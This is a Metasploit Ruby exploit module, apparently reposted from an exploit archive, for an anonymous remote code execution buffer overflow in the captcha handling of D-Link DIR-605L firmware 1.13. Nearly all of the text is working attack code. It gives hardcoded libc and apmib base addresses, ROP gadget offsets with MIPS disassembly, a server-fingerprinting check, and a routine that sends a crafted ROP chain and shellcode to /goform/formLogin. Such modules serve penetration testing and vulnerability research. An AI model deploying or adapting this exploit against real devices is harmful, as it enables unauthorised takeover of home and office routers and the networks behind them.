D-Link DIR-605L Captcha Handling Buffer Overflow Exploit

:
23.10.2013
:
DLink DIR-605L Firmware 1.13
:

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking # Because only has been tested on a QEMU emulated environment

HttpFingerprint = { :pattern => [ /Boa/ ] }

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link DIR-605L Captcha Handling Buffer Overflow',
'Description' => %q{
This module exploits an anonymous remote code execution on D-Link DIR-605L routers. The
vulnerability exists while handling user supplied captcha information, and is due to the
insecure usage of sprintf on the getAuthCode() function. This module has been tested
successfully on DLink DIR-605L Firmware 1.13 under a QEMU environment.
},
'Author' =>
[
'Craig Heffner', # Vulnerability discovery, original exploit
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'Payload' =>
{
'DisableNops' => true,
'Space' => 3000,
'BadChars' => "\x00\x67\x26\x2b"
},
'Platform' => ['linux'],
'Arch' => ARCH_MIPSBE,
'References' =>
[
[ 'OSVDB', '86824' ],
[ 'URL', 'http://www.devttys0.com/2012/10/exploiting-a-mips-stack-overflow/' ]
],
'Targets' =>
[
[ 'DLink DIR-605L 1.13',
{
'Offset' => 94,
'LibcBase' => 0x2ab86000, # According to Original Exploit by Craig Heffner
'ApmibBase' => 0x2aaef000, # According to Original Exploit by Craig Heffner
#'LibcBase' => 0x4212e000, # QEMU environment
#'ApmibBase' => 0x42095000, # QEMU environment
#LOAD:000248D4 li $a0, 1 ; set $a0 for the sleep() call
#LOAD:000248D8 move $t9, $s1 ; $s1 is controlled after the overflow
#LOAD:000248DC jalr $t9
'Ret' => 0x248D4, # from libc
#LOAD:0002B954 move $t9, $s2 # Controlled
#LOAD:0002B958 lw $ra, 0x30+var_4($sp) # allows to get controlled $ra from the stack
#LOAD:0002B95C lw $s4, 0x30+var_8($sp)
#LOAD:0002B960 lw $s3, 0x30+var_C($sp)
#LOAD:0002B964 lw $s2, 0x30+var_10($sp)
#LOAD:0002B968 lw $s1, 0x30+var_14($sp) # allows to get controlled $s1 from the stack
#LOAD:0002B96C lw $s0, 0x30+var_18($sp)
#LOAD:0002B970 jr $t9
'RopJmpSleep' => 0x2B954, # from libc
'RopSleep' => 0x23D30, # from libc # Sleep Function Address # sleep() to flush the data cache
#LOAD:000027E8 move $t9, $s1 # Controlled
#LOAD:000027EC jalr $t9 ; sub_22D0
#LOAD:000027F0 addiu $a2, $sp, 0x40+var_24 ; put pointer to the stack on $a2 # executed because of pipelining
'RopPtrStack' => 0x027E8, # from apmi
#LOAD:00001D78 move $t9, $a2 ; $a2 contains a poiner to the stack
#LOAD:00001D7C jalr $t9
'RopJmpStack' => 0x01D78 # from apmi
}
]
],
'DisclosureDate' => 'Oct 08 2012',
'DefaultTarget' => 0))

end

def check
res = send_request_cgi({ 'uri' => '/comm.asp' })
if res and res.code == 200 and res.body =~ /var modelname="DIR-605L"/ and res.headers["Server"] and res.headers["Server"] =~ /Boa\/0\.94\.14rc21/
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end

def exploit

shellcode = ""
shellcode << rand_text(target['Offset']) # Padding
shellcode << rand_text(4) # $s0
shellcode << [target['LibcBase'] + target['RopJmpSleep']].pack("N") # $s1
shellcode << [target['LibcBase'] + target['RopSleep']].pack("N") # $s2
shellcode << rand_text(4) # $s3
shellcode << [target['LibcBase'] + target.ret].pack("N") # $ra
shellcode << rand_text(0x1c) # filler
shellcode << rand_text(4) # $s0
shellcode << [target['ApmibBase'] + target['RopJmpStack']].pack("N") # $s1
shellcode << rand_text(4) # $s2
shellcode << rand_text(4) # $s3
shellcode << rand_text(4) # $s4
shellcode << [target['ApmibBase'] + target['RopPtrStack']].pack("N") # $ra
shellcode << rand_text(0x1c) # filler
shellcode << payload.encoded # shellcode

print_status("#{peer} - Sending exploit...")

send_request_cgi({
'method' => 'POST',
'uri' => "/goform/formLogin",
'encode_params' => false,
'vars_post' => {
'VERIFICATION_CODE' => 'myvoiceismypassportverifyme',
'VER_CODE' => '1234',
'login_n' => 'admin',
'FILECODE' => shellcode,
'curTime' => '1348588030496',
'login_pass' => 'Zm9vb255b3UA',
'login_name' => 'admin'
}
})

end

end

CAPTCHA